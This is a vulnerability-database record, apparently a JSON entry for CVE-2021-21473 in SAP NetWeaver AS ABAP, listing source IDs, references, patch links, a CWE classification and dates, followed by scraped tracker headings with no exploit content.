https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day\n\n\nWorkaround:\n-----------\nNone\n\n\nAdvisory URL:\n-------------\nhttps://sec-consult.com/vulnerability-lab/\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\n\nSEC Consult, an Atos company\nEurope | Asia | North America\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an\nAtos company. It ensures the continued knowledge gain of SEC Consult in the\nfield of network and application security to stay ahead of the attacker. The\nSEC Consult Vulnerability Lab supports high-quality penetration testing and\nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities\nand valid recommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://sec-consult.com/career/\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://sec-consult.com/contact/\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: security-research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF F. Hagg, A. Meier / @2022\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "db": "PACKETSTORM",
        "id": "167229"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-21473",
        "trust": 3.4
      },
      {
        "db": "PACKETSTORM",
        "id": "167229",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825",
        "trust": 0.8
      },
      {
        "db": "CS-HELP",
        "id": "SB2021060803",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022050077",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021041363",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-21473",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "PACKETSTORM",
        "id": "167229"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "id": "VAR-202106-0705",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.094017096
  },
  "last_update_date": "2022-09-30T20:13:41.546000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SAP\u00a0Security\u00a0Patch\u00a0Day\u00a0-\u00a0June\u00a02021",
        "trust": 0.8,
        "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=578125999"
      },
      {
        "title": "SAP NetWeaver AS ABAP Business Server Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=153665"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-862",
        "trust": 1.0
      },
      {
        "problemtype": "Lack of authentication (CWE-862) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/167229/sap-application-server-abap-abap-platform-code-injection-sql-injection-missing-authorization.html"
      },
      {
        "trust": 1.7,
        "url": "https://launchpad.support.sap.com/#/notes/3002517"
      },
      {
        "trust": 1.7,
        "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=578125999"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2022/may/42"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21473"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021060803"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022050077"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-june-2021-35633"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/862.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21468"
      },
      {
        "trust": 0.1,
        "url": "https://developers.sap.com/topics/abap-platform.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21466"
      },
      {
        "trust": 0.1,
        "url": "https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21465"
      },
      {
        "trust": 0.1,
        "url": "http://blog.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-6318"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33678"
      },
      {
        "trust": 0.1,
        "url": "https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71"
      },
      {
        "trust": 0.1,
        "url": "https://www.sap.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26832"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://www.sap.com/about/company.html"
      },
      {
        "trust": 0.1,
        "url": "https://sec-consult.com/vulnerability-lab/"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.support.sap.com/#/securitynotes"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/sec_consult"
      },
      {
        "trust": 0.1,
        "url": "https://sec-consult.com/career/"
      },
      {
        "trust": 0.1,
        "url": "https://sec-consult.com/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://wiki.scn.sap.com/wiki/display/psr/sap+security+patch+day"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "PACKETSTORM",
        "id": "167229"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "PACKETSTORM",
        "id": "167229"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-06-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "date": "2022-02-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "date": "2022-05-19T16:00:07",
        "db": "PACKETSTORM",
        "id": "167229"
      },
      {
        "date": "2021-06-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      },
      {
        "date": "2021-04-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "date": "2021-06-09T14:15:00",
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "date": "2022-02-24T08:44:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "date": "2022-05-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      },
      {
        "date": "2021-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "date": "2022-09-30T02:50:00",
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP\u00a0NetWeaver\u00a0AS\u00a0for\u00a0ABA\u00a0 and \u00a0ABAP\u00a0Platform\u00a0 Vulnerability in Microsoft",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2021-21473 (GCVE-0-2021-21473)

CERTFR-2021-AVI-440

Solution

CERTFR-2021-AVI-607

Solution

CNVD-2021-47712

FKIE_CVE-2021-21473

GHSA-38GP-JHV5-4HGH

GSD-2021-21473

VAR-202106-0705

Vendor description:

Business recommendation:

Vulnerability overview/description:

Proof of concept:

Vulnerable / tested versions:

Vendor contact timeline:

CVE-2020-6318

CVE-2020-26808

CVE-2020-26832

CVE-2021-21465 / CVE-2021-21468

CVE-2021-21466 / CVE-2021-21473

CVE-2021-33678

Solution:

Workaround:

Advisory URL:

Tags

Sightings

Nomenclature